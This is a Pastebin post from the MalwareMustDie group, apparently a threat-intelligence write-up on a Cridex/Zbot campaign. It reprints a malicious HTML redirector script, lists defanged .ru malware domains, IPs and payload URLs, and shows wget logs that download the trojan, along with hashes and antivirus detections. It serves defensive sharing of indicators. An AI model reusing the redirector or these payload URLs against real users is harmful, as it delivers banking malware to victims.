Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #MalwareMustDie! On duty: @unixfreaxjp ~]$ date
- Thu Mar 14 02:28:24 JST 2013
- Credit: thanks for @hugbomb and @nyxbone
- // Case: http://malwaremustdie.blogspot.jp/2013/02/bhek-cridex-combo-with-ransomware.html
- // Case: http://malwaremustdie.blogspot.com/2013/03/ru8080columnphp-hey-stealer-what-do-you.html
- // Rgx: http://goo.gl/KvD2q
- #Cridex domains today:
- // infector pattern a redirector pages:
- <html>
- <head>
- <meta h00p-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>Please wait</title>
- </head>
- <body>
- <h2><b>Please wait a moment ・・・ You will be forwarded・ </h2></b>
- <h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
- <script>
- var1=49;
- var2=var1;
- if(var1==var2) {document・location="h00p://giimiiifo・ru:8080/forum/links/column・php";}
- </script>
- </body>
- </html>
- //domains:PORT (all)
- gimiiiank.ru:8080
- giimiiifo.ru:8080
- giminaaaao.ru:8080
- giminkfjol.ru:8080
- giliaonso.ru:8080
- forumny.ru:8080
- forum-ny.ru:8080
- forumla.ru:8080
- forum-la.ru:8080
- foruminanki.ru:8080
- forumilllionois.ru:8080
- //IP:
- 94・102・14・239,
- 213・215・240・24,
- 93・174・138・48
- //payload url:
- h00p://gimiiiank・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://giimiiifo・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://giminaaaao・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://giminkfjol・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://giliaonso・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://forumny・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://forum-ny・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://forumla・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://forum-la・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://foruminanki・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- h00p://forumilllionois・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- //payload download snapshot:
- http://urlquery.net/report.php?id=1407705
- http://urlquery.net/report.php?id=1407845
- http://urlquery.net/report.php?id=1407852
- http://urlquery.net/report.php?id=1407854
- http://urlquery.net/report.php?id=1407859
- http://urlquery.net/report.php?id=1407866
- http://urlquery.net/report.php?id=1407806
- http://urlquery.net/report.php?id=1407807
- http://urlquery.net/queued.php?id=17250910
- http://urlquery.net/report.php?id=1407711
- //some of the download logs as PoC (text):
- --2013-03-14 02:17:05-- h00p://gimiiiank・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- Resolving gimiiiank・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
- Connecting to gimiiiank・ru|94・102・14・239|:8080・・・ connected・
- h00p request sent, awaiting response・・・ 200 OK
- Length: 175104 (171K) [application/x-msdownload]
- Saving to: `sample1・exe'
- 2013-03-14 02:17:09 (63・6 KB/s) - `sample1・exe' saved [175104/175104]
- --2013-03-14 02:17:36-- h00p://giminaaaao・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- Resolving giminaaaao・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
- Connecting to giminaaaao・ru|94・102・14・239|:8080・・・ connected・
- Saving to: `sample2・exe'
- 2013-03-14 02:17:40 (62・8 KB/s) - `sample2・exe' saved [175104/175104]
- --2013-03-14 02:18:07-- h00p://giimiiifo・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
- Resolving giimiiifo・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
- Connecting to giimiiifo・ru|94・102・14・239|:8080・・・ connected・
- h00p request sent, awaiting response・・・ 200 OK
- Length: 175104 (171K) [application/x-msdownload]
- Saving to: `sample3・exe'
- 2013-03-14 02:18:12 (65・0 KB/s) - `sample3・exe' saved [175104/175104]
- // same sample PoC:
- $ md5 sample*
- [Path] / filename MD5 sum
- -------------------------------------------------------------------------------
- [C:\Program Files\GnuWin32-new\bin\]
- sample1・exe f0063edef419009b1564e5fba81157db
- sample2・exe f0063edef419009b1564e5fba81157db
- sample3・exe f0063edef419009b1564e5fba81157db
- [8]VirusTotal : https://www.virustotal.com/en/file/028b2eccba3d7e0792e4fcab685c4003c7bb297773f5b14b3cfe55c62a41304a/analysis/
- SHA256: 028b2eccba3d7e0792e4fcab685c4003c7bb297773f5b14b3cfe55c62a41304a
- SHA1: fb570e861a9388327a77635ca0568d4b73342296
- MD5: f0063edef419009b1564e5fba81157db
- File size: 171・0 KB ( 175104 bytes )
- File name: contacts・exe / info・exe / calc・exe
- File type: Win32 EXE
- Tags: peexe
- Detection ratio: 3 / 44
- Analysis date: 2013-03-13 15:40:26 UTC ( 1 hour, 52 minutes ago )
- Malwarebytes : Trojan・Zbot
- AhnLab-V3 : Spyware/Win32・Zbot
- Kaspersky : HEUR:Trojan・Win32・Generic
- ---
- #MalwareMustDie!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement